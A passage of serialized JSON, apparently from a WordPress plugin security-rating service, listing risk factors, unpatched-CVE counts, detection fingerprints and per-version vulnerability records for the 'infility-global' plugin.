Users should strongly consider disabling or replacing this plugin until these critical issues are addressed.",[1259,1261,1263,1265,1267,1269,1271],{"reason":1260,"points":270},"Unprotected AJAX handlers",{"reason":1262,"points":294},"Unpatched CVEs (6 total)",{"reason":1264,"points":294},"High severity unpatched CVEs (4 total)",{"reason":1266,"points":270},"Dangerous function: unserialize",{"reason":1268,"points":436},"Taint analysis: Flows with unsanitized paths",{"reason":1270,"points":270},"Missing nonce checks",{"reason":1272,"points":270},"Missing capability checks","2026-03-16T21:10:02.783Z",{"wat":1275,"direct":1304},{"assetPaths":1276,"generatorPatterns":1289,"scriptPaths":1290,"versionParams":1291},[1277,1278,1279,1280,1281,1282,1283,1284,1285,1286,1287,1288],"\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fcss\u002Finfility-global.css","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility-global.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_chat_tool.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_data_collection.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_lang_switch.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_login_security.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_redirect.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_sitemap.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_whatsapp.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_elementor_posts.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_gutenberg.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_reading_progress.js",[],[1278,1279,1280,1281,1282,1283,1284,1285,1286,1287,1288],[1292,1293,1294,1
295,1296,1297,1298,1299,1300,1301,1302,1303],"infility-global\u002Fcss\u002Finfility-global.css?ver=","infility-global\u002Fjs\u002Finfility-global.js?ver=","infility-global\u002Fjs\u002Finfility_global_chat_tool.js?ver=","infility-global\u002Fjs\u002Finfility_global_data_collection.js?ver=","infility-global\u002Fjs\u002Finfility_global_lang_switch.js?ver=","infility-global\u002Fjs\u002Finfility_global_login_security.js?ver=","infility-global\u002Fjs\u002Finfility_global_redirect.js?ver=","infility-global\u002Fjs\u002Finfility_global_sitemap.js?ver=","infility-global\u002Fjs\u002Finfility_global_whatsapp.js?ver=","infility-global\u002Fjs\u002Finfility_global_elementor_posts.js?ver=","infility-global\u002Fjs\u002Finfility_global_gutenberg.js?ver=","infility-global\u002Fjs\u002Finfility_global_reading_progress.js?ver=",{"cssClasses":1305,"htmlComments":1307,"htmlAttributes":1309,"restEndpoints":1310,"jsGlobals":1312,"shortcodeOutput":1315},[1306],"infility-global-chat-tool-box",[1308],"infility_global_chat_tool.js",[],[1311],"\u002Fwp-json\u002Finfility-global\u002Fv1\u002Fajax",[1313,1314],"infility_global_ajax_object","infility_global_config",[1316],"[infility_power_by]",{"error":391,"url":1318,"statusCode":823,"statusMessage":1319,"message":1319},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Finfility-global\u002Fbundle","no bundle for this plugin 
yet",{"slug":4,"current_version":6,"total_versions":25,"versions":1321},[1322,1340,1358,1376,1394,1412,1430],{"version":1323,"download_url":1324,"svn_tag_url":1325,"released_at":35,"has_diff":46,"diff_files_changed":1326,"diff_lines":35,"trac_diff_url":1327,"vulnerabilities":1328,"is_current":46},"1.4.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.4.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.4.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.4&new_path=%2Finfility-global%2Ftags%2F1.4.1",[1329,1330,1331,1332,1333,1334,1335,1336,1337,1338,1339],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1341,"download_url":1342,"svn_tag_url":1343,"released_at":35,"has_diff":46,"diff_files_changed":1344,"diff_lines":35,"
trac_diff_url":1345,"vulnerabilities":1346,"is_current":46},"1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.3.1&new_path=%2Finfility-global%2Ftags%2F1.4",[1347,1348,1349,1350,1351,1352,1353,1354,1355,1356,1357],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1359,"download_url":1360,"svn_tag_url":1361,"released_at":35,"has_diff":46,"diff_files_changed":1362,"diff_lines":35,"trac_diff_url":1363,"vulnerabilities":1364,"is_current":46},"1.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.3.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.3.1\u0
02F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.3&new_path=%2Finfility-global%2Ftags%2F1.3.1",[1365,1366,1367,1368,1369,1370,1371,1372,1373,1374,1375],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1377,"download_url":1378,"svn_tag_url":1379,"released_at":35,"has_diff":46,"diff_files_changed":1380,"diff_lines":35,"trac_diff_url":1381,"vulnerabilities":1382,"is_current":46},"1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.2&new_path=%2Finfility-global%2Ftags%2F1.3",[1383,1384,1385,1386,1387,1388,1389,1390,1391,1392,1393],{"id":144,"url_slug":145,"title":14
6,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1395,"download_url":1396,"svn_tag_url":1397,"released_at":35,"has_diff":46,"diff_files_changed":1398,"diff_lines":35,"trac_diff_url":1399,"vulnerabilities":1400,"is_current":46},"1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.1&new_path=%2Finfility-global%2Ftags%2F1.2",[1401,1402,1403,1404,1405,1406,1407,1408,1409,1410,1411],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":8
3,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1413,"download_url":1414,"svn_tag_url":1415,"released_at":35,"has_diff":46,"diff_files_changed":1416,"diff_lines":35,"trac_diff_url":1417,"vulnerabilities":1418,"is_current":46},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.0&new_path=%2Finfility-global%2Ftags%2F1.1",[1419,1420,1421,1422,1423,1424,1425,1426,1427,1428,1429],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_v
ersion":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1431,"download_url":1432,"svn_tag_url":1433,"released_at":35,"has_diff":46,"diff_files_changed":1434,"diff_lines":35,"trac_diff_url":35,"vulnerabilities":1435,"is_current":46},"1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.0\u002F",[],[1436,1437,1438,1439,1440,1441,1442,1443,1444,1445,1446],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_sco
re":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35}]